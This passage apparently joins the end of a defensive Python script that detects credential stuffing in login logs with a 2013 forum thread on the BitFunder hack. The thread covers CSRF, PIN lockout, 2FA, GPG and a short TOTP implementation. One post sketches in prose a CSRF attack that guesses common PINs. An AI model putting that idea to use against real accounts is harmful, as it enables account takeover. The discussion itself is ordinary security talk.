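            out["blocked_by_2fa" if a.twofa == "required" else "compromised"].add(a.user)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    attempts = parse_log(SAMPLE_LOG)
    sources = stuffing_sources(attempts)
    print("stuffing sources:", sources)
    print("matched:", matched_credentials(attempts, sources))
```

The same split drives the response Ukyo describes: the blocked group gets a password-change notice, the compromised group gets the transfer review, and the per-IP count is what a rate limit or lockout would key on.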


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: burnside on July 09, 2013, 12:53:26 AM
The easiest way to protect yourself would be using web applications that are coded securely. Now I'm not sure if btct.co uses an anti csrf token (I don't think it does?), but their PIN / 2 FA system makes this attack less useful (an attacker can just use JS to submit ~100 most common PINs)

Close, but not entirely correct.  Lockout gets triggered after ~5 bad PIN attempts.

Any btct.co users reading this, turn on 2FA if you can.  The PINs help but are really only placeholders for the 2FA form fields in the interfaces.

Websites are not safe for this application. Learn GPG. That is all.

I detect many suppressed lels in this statement.

GPG used incorrectly (key on your pc) is about as useful as the PINs.  It's better than nothing but a virus can grab your key easy as it can log your PIN.  Using GPG correctly via 2nd non-networked PC and sneakernet storage device is a PITA compared to gAuth or Yubikey.


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: 🏰 TradeFortress 🏰 on July 09, 2013, 01:34:29 AM
GPG used incorrectly (key on your pc) is about as useful as the PINs.  It's better than nothing but a virus can grab your key easy as it can log your PIN.  Using GPG correctly via 2nd non-networked PC and sneakernet storage device is a PITA compared to gAuth or Yubikey.
But that's not a bad idea if you're dealing with a lot of money. You don't stuff hundreds of thousands of dollars in your mattress, do you?


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: burnside on July 09, 2013, 11:30:30 PM
GPG used incorrectly (key on your pc) is about as useful as the PINs.  It's better than nothing but a virus can grab your key easy as it can log your PIN.  Using GPG correctly via 2nd non-networked PC and sneakernet storage device is a PITA compared to gAuth or Yubikey.
But that's not a bad idea if you're dealing with a lot of money. You don't stuff hundreds of thousands of dollars in your mattress, do you?

I think the point I was trying to make is that GPG is not 2FA out of the box.  You have to follow specific practices to make it that way, and such behavior is not nearly as intuitive as the alternatives.  It is difficult enough to use that it actually encourages insecure use.



Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: dooglus on July 10, 2013, 04:19:18 AM
you could probably even implement it yourself in a few lines of any scripting language

You can do it in 7 lines of Python code:

Code:
import hmac, base64, struct, hashlib, time

def get_hotp_token(secret, number):
    # secret is the base32 string the site shows when you enable 2FA; number is the counter
    h = hmac.new(base64.b32decode(secret, True), struct.pack(">Q", number), hashlib.sha1).digest()
    o = h[19] & 15  # dynamic truncation offset (RFC 4226); h[19] is already an int in Python 3
    # 6-digit code as an integer; zero-pad it to 6 digits when displaying it
    return (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000

def get_totp_token(secret):
    # TOTP = HOTP over the number of 30-second periods since the Unix epoch
    return get_hotp_token(secret, int(time.time())//30)


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: whiskers75 on July 10, 2013, 08:38:48 AM
Is this one (http://www.maxoutput.com/authenticator/) good to use with 2-factor?
It works with bitfunder; then I went to add 2-factor on weexchange and now I can't log in again. weexchange is very "unstable", like a "beta website"  >:(
Looks like it.  ;)


Title: Re: BitFunder.com has been hacked and IT IS BitFunder's fault
Post by: Ukyo on July 10, 2013, 02:47:17 PM
Is this one (http://www.maxoutput.com/authenticator/) good to use with 2-factor?
It works with bitfunder; then I went to add 2-factor on weexchange and now I can't log in again. weexchange is very "unstable", like a "beta website"  >:(

Most likely you failed to enter the password when setting up 2-factor on weexchange, and the page reloaded changing your 2-factor code after you had already scanned it, and then you locked yourself out.

If you need help with this, pm me.

Thanks,
Ukyo